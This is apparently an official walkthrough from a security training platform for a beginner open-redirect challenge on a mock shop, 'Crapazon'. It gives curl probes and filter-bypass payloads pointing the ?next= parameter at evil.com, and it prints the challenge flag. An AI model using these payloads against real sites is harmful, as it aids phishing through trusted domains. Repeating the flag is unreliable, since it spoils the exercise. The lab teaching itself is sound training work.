HACKR.GG
hackr.gg — Crapazon — Open Redirect Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Crapazon — Open Redirect

Open Redirect · Open Redirect
Difficulty
Beginner
Vuln class
Open Redirect
Steps
3
// Objective
Abuse the redirect parameter to send a user to an arbitrary external URL and retrieve the flag.
// Tools required
BrowserBurp Suitecurl
// Step-by-step walkthrough
1
Find the redirect parameter
After login, Crapazon uses a ?next= parameter to redirect back to where you came from. Test if it accepts external URLs.
Command / Input
curl -I "http://TARGET/login?next=https://evil.com"
Output
HTTP/1.1 302 Found Location: https://evil.com
If the redirect goes to evil.com, the parameter is unvalidated — open redirect confirmed.
2
Bypass common filters
If https://evil.com is blocked, try common bypasses: //evil.com, /\evil.com, or ?next=javascript:void(0).
Command / Input
http://TARGET/login?next=//evil.com http://TARGET/login?next=/\evil.com
3
Retrieve the flag
Use the working redirect payload — the flag is served when the redirect executes successfully.
Command / Input
GET /login?next=https://evil.com
Output
HackrGG{0p3n_r3d1r3ct_url_byp4ss3d}
The flag appears in the response headers or body upon successful redirect.
// Flag
Flag value
HackrGG{0p3n_r3d1r3ct_url_byp4ss3d}
Returned when a valid redirect to an external URL is triggered.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute